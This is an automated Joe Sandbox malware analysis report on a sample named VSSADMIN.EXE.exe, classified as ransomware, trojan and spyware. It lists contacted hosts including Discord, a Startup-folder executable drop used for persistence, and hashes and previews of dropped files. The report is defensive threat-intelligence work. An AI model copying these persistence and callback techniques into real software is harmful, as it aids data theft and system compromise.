                                                                                                                                                            https://www.openssl.org/HVSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245994756.00007FFD43FB3000.00000004.00000001.01000000.00000010.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);VSSADMIN.EXE.exe, 00000001.00000003.190605654.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.microsoftESSAG~1.JSOy.0VSSADMIN.EXE.exe, 00000001.00000003.244345388.0000014C6CFFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		low
                                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://peps.python.org/pep-0263/VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                    		high

                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                    Public IPs

                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                    208.95.112.1
                                                                                                                                                                    		ip-api.comUnited States
                                                                                                                                                                    		53334TUT-ASUSfalse
                                                                                                                                                                    162.159.138.232
                                                                                                                                                                    		discord.comUnited States
                                                                                                                                                                    		13335CLOUDFLARENETUStrue

                                                                                                                                                                    Private

                                                                                                                                                                    IP
                                                                                                                                                                    192.168.2.1

                                                                                                                                                                    General Information

                                                                                                                                                                    Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                    Analysis ID:1309234
                                                                                                                                                                    Start date and time:2023-09-15 22:15:10 +02:00
                                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                                    Overall analysis duration:0h 11m 27s
                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                    Report type:full
                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                    Number of analysed new started processes analysed:96
                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                    Technologies:
                                                                                                                                                                    • HCA enabled
                                                                                                                                                                    • EGA enabled
                                                                                                                                                                    • HDC enabled
                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                    Sample file name:VSSADMIN.EXE.exe
                                                                                                                                                                    Detection:MAL
                                                                                                                                                                    Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@126/90@8/3
                                                                                                                                                                    EGA Information:
                                                                                                                                                                    • Successful, ratio: 60%
                                                                                                                                                                    HDC Information:Failed
                                                                                                                                                                    HCA Information:
                                                                                                                                                                    • Successful, ratio: 95%
                                                                                                                                                                    • Number of executed functions: 133
                                                                                                                                                                    • Number of non-executed functions: 213
                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                    Warnings

                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.251.32.67, 204.79.197.200, 13.107.21.200
                                                                                                                                                                    • Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, mm-mm.bing.net.trafficmanager.net, dual-a-0001.a-msedge.net, gstatic.com, displaycatalog.mp.microsoft.com, arc.msn.com
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6128 because it is empty
                                                                                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7028 because it is empty
                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                    • VT rate limit hit for: VSSADMIN.EXE.exe

                                                                                                                                                                    Simulations

                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                    22:15:58API Interceptor79x Sleep call for process: powershell.exe modified
                                                                                                                                                                    22:15:58API Interceptor7x Sleep call for process: WMIC.exe modified

                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):7380816
                                                                                                                                                                    Entropy (8bit):7.992692630132626
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:98304:9jzHqdVfB2GyuT/9vUIdD9C+z3zO917vOTh+ezsNh75S2zh/hQqIvmJ1YPFlVtqU:9PQsGbT/9bvLz3S1bA32zOqxYPdH
                                                                                                                                                                    MD5:B8E16B93BE678043EC587EC1C759C2DE
                                                                                                                                                                    SHA1:A8C98BA05AC710A92C4DF15956F81CF81073746F
                                                                                                                                                                    SHA-256:15DD97919EBCB246ADD4FC9E9B201BDD67DA510C79F8D89CB4EDC7FBF64858FA
                                                                                                                                                                    SHA-512:43728E686D684998E6E80344E7A0F05CAA106262CEBC5B5815619B74EA7856DAB13B2954085E188D7EC3B96581390D86A4D4BEF13C3FDA9FD26844A9494D571F
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........r...r...r...q...r...w.'.r...v...r.<.....r.<.w...r.<.v...r.<.q...r...s...r...s...r...v...r...p...r.Rich..r.........................PE..d...qm.e.........."....$............@..........@......................................p...`....................................................x.... ..LK....... ...{p.H$...p..X...................................@...@............................................text...0........................... ..`.rdata...*.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc...LK... ...L..................@..@.reloc..X....p.......8..............@..B................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1104
                                                                                                                                                                    Entropy (8bit):5.27634052513024
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:3qPpQdo4KAxX5qRP6hTpsFL9t3UqKaBMKk9LC:6Pei4nqRSXsFL9tkqpBMN9+
                                                                                                                                                                    MD5:519FAAF473483468B40797D69DC21C2F
                                                                                                                                                                    SHA1:A9924A714FFBC72D28B3B9B7D4620FFF1C1252B0
                                                                                                                                                                    SHA-256:96ED4EEF199ED8B5602E4F74C1B0BDF0B313F1C54735A1FC07287FEA1AABBB98
                                                                                                                                                                    SHA-512:6D48FBB8068717FE3CB48730053BE2A518310E87347671BAF1D6E5DA5791F093320869F54DF769CEC9587F586A143DB5C9ACE1E10D41F53015E8CC2EF6B3BFE0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:@...e.................................2.........................8....................@.Z:.h...........System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServices4................ .v'#-N....M..d........System.Xml..4...............A.....A....'.b.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<..................ASG...M-.?.........System.Transactions.<.................hr..B.....w.O........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD.....................G..H.).7.........System.Configuration.Ins

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\DTBZGIOOSO.docx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.705615236042988
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                    MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                    SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                    SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                    SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\HTAGVDFUIE.pdf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.692693183518806
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                    MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\KATAXZVCPS.mp3

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\KZWFNRXYKI.mp3

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.694982189683734
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                    MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                    SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                    SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                    SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\LTKMYBSEYZ.jpg

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.687722658485212
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                    MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                    SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                    SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                    SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\ONBQCLYSPU.docx

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                    SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\ONBQCLYSPU.pdf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.699434772658264
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                    MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                    SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                    SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
